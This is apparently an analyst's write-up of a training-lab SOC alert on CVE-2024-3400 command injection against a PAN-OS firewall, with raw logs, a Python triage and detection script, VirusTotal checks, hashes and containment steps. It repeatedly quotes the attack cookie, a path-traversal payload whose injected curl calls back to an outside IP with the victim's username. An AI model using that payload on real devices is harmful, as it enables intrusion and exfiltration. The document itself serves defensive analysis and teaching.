SOC274 — Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)

Tomasz Kozlowski
Apr 28, 2024

Ticket INFO:

A critical command injection vulnerability has been identified in Palo Alto Networks PAN-OS software

EventID :

249

Event Time :

Apr, 18, 2024, 03:09 AM

Rule :

SOC274 — Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)

Level :

Security Analyst

Hostname :

PA-Firewall-01

Destination IP Address :

172.16.17.139

Source IP Address :

144.172.79.92

HTTP Request Method :

POST

Requested URL :

172.16.17.139/global-protect/login.esp

cookie :

SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)

Alert Trigger Reason :

Characteristic exploit pattern detected in the cookie and request, indicative of exploitation of CVE-2024-3400.

Device Action :

Allowed.

SOC Analyst Action:

Checked the Log Management tab for 144.172.79[.]92 and looked the IP up on VirusTotal.

Logs:

RAW LOG

2024-04-18 15:09:42,628: dt_send INFO TX_DIR: send file dir: /opt/panlogs/tmp/device_telemetry/day/, n_files: 1

2024-04-18 15:09:42,628 : dt_send INFO sorted file list: tmp_dir: /opt/panlogs/tmp/device_telemetry/day/*

2024-04-18 15:09:42,629: dt_send INFO TX_DIR: send file dir: fname: /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)

2024-04-18 15:09:42,629 : dt_send INFO TX FILE: send_fname: /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)

2024-04-18 15:09:42,630: dt_send INFO TX_FILE: dest server ip: 144.172.79.92

2024-04-18 15:09:42,630 : dt_send INFO TX FILE: send_file_cmd: /usr/local/bin/dt_curl -i 172.16.17.139 -f /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)

2024-04-18 15:09:43,152: dt_send INFO TX FILE: curl cmd status: 24, 24; err msg: 'DNS lookup failed'
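The two traces above are the two stages of this exploit: the SESSID cookie path-traverses out of the session directory and plants a file whose name is a shell command, and the device-telemetry sender (dt_send) later interpolates that file name, unquoted, into a dt_curl shell command. As an added example (my own triage helper, not code from the original write-up or from Palo Alto Networks), the script below checks both stages and correlates them into the evidence a ticket would carry. The request and log lines inside it are constructed to mirror the alert; the function names (inspect_sessid, telemetry_hits, triage, defang) and the traversal-only "probe" verdict are my assumptions.

```python
"""Triage helper for the CVE-2024-3400 exploit pattern in this alert.

Added example: not code from the original write-up or from Palo Alto Networks.
Stage 1 plants a file via path traversal in the SESSID cookie; stage 2 is the
telemetry sender (dt_send/dt_curl) expanding that file name, unquoted, inside a
shell command. Each stage leaves its own trace, checked by one function below.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed samples shaped like the alert and the raw log above (not captures).
SAMPLE_REQUESTS = [
    ("POST", "172.16.17.139/global-protect/login.esp",
     "SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)"),
    ("POST", "172.16.17.139/global-protect/login.esp", "SESSID=9f2c4e1ab7d3"),
    # Traversal with no command: a file-write probe, assumed benign-looking name.
    ("POST", "172.16.17.139/global-protect/login.esp",
     "SESSID=./../../../var/appweb/sslvpndocs/global-protect/portal/images/probe.txt"),
]
SAMPLE_TELEMETRY = [
    "2024-04-18 15:09:42,630 : dt_send INFO TX FILE: send_file_cmd: /usr/local/bin/dt_curl "
    "-i 172.16.17.139 -f /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)",
    "2024-04-18 15:10:01,004 : dt_send INFO TX FILE: send_file_cmd: /usr/local/bin/dt_curl "
    "-i 172.16.17.139 -f /opt/panlogs/tmp/device_telemetry/day/dt_2024_04_18.tgz",
]

# Shell metacharacters that turn a file name into a command once it is expanded
# unquoted in a shell line: backtick, $(...), and ${IFS} standing in for a space.
INJECTION_RE = re.compile(r"`|\$\(|\$\{IFS\}")
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")
CALLBACK_RE = re.compile(r"curl\$\{IFS\}(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?")
DT_CURL_RE = re.compile(r"send_file_cmd: /usr/local/bin/dt_curl -i (\S+) -f (.+)$")


@dataclass
class CookieVerdict:
    verdict: str                       # "benign" | "traversal" | "exploit"
    sessid: str
    callback_ip: Optional[str] = None  # host the injected curl calls back to
    callback_port: Optional[str] = None


def inspect_sessid(cookie_header: str) -> CookieVerdict:
    """Classify the SESSID cookie on a /global-protect/ request.

    traversal + shell metacharacters -> "exploit"   (this alert)
    traversal only                   -> "traversal" (stage-1 file write / probe)
    otherwise                        -> "benign"
    """
    m = re.search(r"(?:^|;\s*)SESSID=([^;]*)", cookie_header)
    sessid = m.group(1) if m else ""
    traversal = bool(TRAVERSAL_RE.search(sessid))
    injection = bool(INJECTION_RE.search(sessid))
    cb = CALLBACK_RE.search(sessid)
    verdict = "exploit" if traversal and injection else "traversal" if traversal else "benign"
    return CookieVerdict(verdict, sessid,
                         cb.group(1) if cb else None, cb.group(2) if cb else None)


def telemetry_hits(log_lines):
    """(device_ip, file_name) for every dt_curl invocation whose file name carries
    shell metacharacters, i.e. the point where the planted name becomes a command."""
    hits = []
    for line in log_lines:
        m = DT_CURL_RE.search(line)
        if m and INJECTION_RE.search(m.group(2)):
            hits.append((m.group(1), m.group(2).strip()))
    return hits


def defang(ip: str) -> str:
    """144.172.79.92 -> 144.172.79[.]92 so the IOC is not clickable in a report."""
    head, _, last = ip.rpartition(".")
    return f"{head}[.]{last}"


def triage(requests, log_lines):
    """Correlate both stages: a suspicious cookie plus the same file name reaching
    dt_curl means the injected command was actually executed by the firewall."""
    hits = telemetry_hits(log_lines)
    evidence = []
    for method, url, cookie in requests:
        v = inspect_sessid(cookie)
        if v.verdict == "benign":
            continue
        item = {"verdict": v.verdict, "method": method, "url": url, "sessid": v.sessid}
        if v.callback_ip:
            item["callback"] = f"{defang(v.callback_ip)}:{v.callback_port or ''}"
        # Match on the planted base name only: the cookie targeted .../hour/ while
        # dt_send picked the file up from .../day/, so full paths need not agree.
        planted = v.sessid.rsplit("/", 1)[-1]
        item["executed_by_telemetry"] = any(f.endswith(planted) for _, f in hits)
        evidence.append(item)
    return evidence


if __name__ == "__main__":
    for item in triage(SAMPLE_REQUESTS, SAMPLE_TELEMETRY):
        print(item)
```

The split into two checks matters for tuning: a traversal-only SESSID with no metacharacters still deserves a look (it is how an attacker tests write access before the real payload), and a dt_send line whose file name contains a backtick or `$(` is evidence of execution even when the cookie that planted it was not logged.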

VirusTotal: 12 security vendors flagged this IP as malicious.

hxxps://www.virustotal.com/gui/ip-address/144.172.79.92/community

Checks on Endpoint security:

Event Time :

Apr 18 2024 15:09:55

Process ID :

1233

Target Process Command Line :

/usr/libexec/mgmtsrvr/start

Image Path :

/usr/bin/python3

Image Hash :

3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927…

Process User :

letsdefend

Parent Name :

systemd

Parent Path :

/lib/systemd/systemd

Command Line :

/usr/bin/python3 update.py

Hash confirmed malicious on VirusTotal:

hxxps://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

Case :

Malicious.

The answer is Command injection.

Not planned

Internet -> Company Network.

Yes.

Action: Escalated to Tier 2 and contained the affected host (PA-Firewall-01) pending further investigation and remediation. Confirmed command injection attack.

Evidence:

IP 144.172.79[.]92
Cookie SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79[.]92:4444?user=$(whoami)
File update.py
Hash :

MD5

0c1554888ce9ed0da1583dbdf7b31651

SHA-1

988fc0d23e6e30c2c46ccec9bbff50b7453b8ba9

SHA-256

3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

URL 172[.]16.17.139/global-protect/login.esp

Verdict: TRUE POSITIVE

Thanks All.

Tomasz Kozlowski

Cyber Security Analyst.
